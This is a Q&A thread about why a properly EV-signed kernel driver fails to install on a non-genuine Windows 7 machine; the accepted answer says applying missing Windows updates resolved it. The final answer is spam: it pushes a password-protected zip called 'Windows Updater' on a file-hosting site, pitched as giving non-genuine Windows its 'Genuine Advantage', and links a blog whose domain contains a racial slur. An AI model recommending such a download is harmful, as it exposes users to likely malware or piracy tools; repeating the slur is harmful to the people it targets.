# Does a non-genuine installation of Windows 7 prevent drivers from installing?

Tags: windows, driver, code-signing

I have a kernel filter driver which I have fully signed with an "EV certificate" and also co-signed through the MS hardware portal.

It works fine on all licenced windows platforms. However, there is one computer in my test lab which is a non-activated Windows 7 (64bit) installation and has been marked as "non-genuine" by Windows. When I install the driver on this machine and reboot, it tells me the driver is not signed correctly and won't work. If I sign the driver the "old" way with a non-EV certificate then it installs with no problems.

I suspect that this is a deliberately enforced limitation on non-genuine copies of windows, but I would like to know for certain that there is nothing wrong with my code signing process.

Comment: I think this should be moved to SuperUser

Comment: @Samy, no, in my opinion this is a development question and belongs here.

Comment: Perhaps the non-genuine status means it hasn't received all of the latest updates?  I'm just guessing, but it wouldn't be too surprising if out-of-date versions of Windows weren't able to process newer signatures.

Comment: @HarryJohnston, I was wondering that too. I may rebuild the computer so it is seen as genuine, but unpatched by any updates and see if the problem persists. Then update and see if it goes away.

Answer (score 1, accepted):

Ok, so to close this off, I found a KB article which mentions this issue: https://technet.microsoft.com/en-us/library/security/3033929

So, I manually applied all available windows updates through the windows update manager (automatic updates is disabled if your installation is marked as non-genuine) and the driver installed with no further troubles.

Answer (score 1):

Windows Updater - Give your copy of Microsoft Windows the True Window Genuine Advantage it deserves! This will get the updates directly from the Microsoft update server, so you know your getting the True Windows Genuine Advantage it deserves, including all the latest stable updates as well!

Download Windows Updater: 
http://www.mediafire.com/file/qonsu3e98lkyh6b/Windows_Updater.zip/file

Password: winup

For more: https://crazyniggasblog.wordpress.com/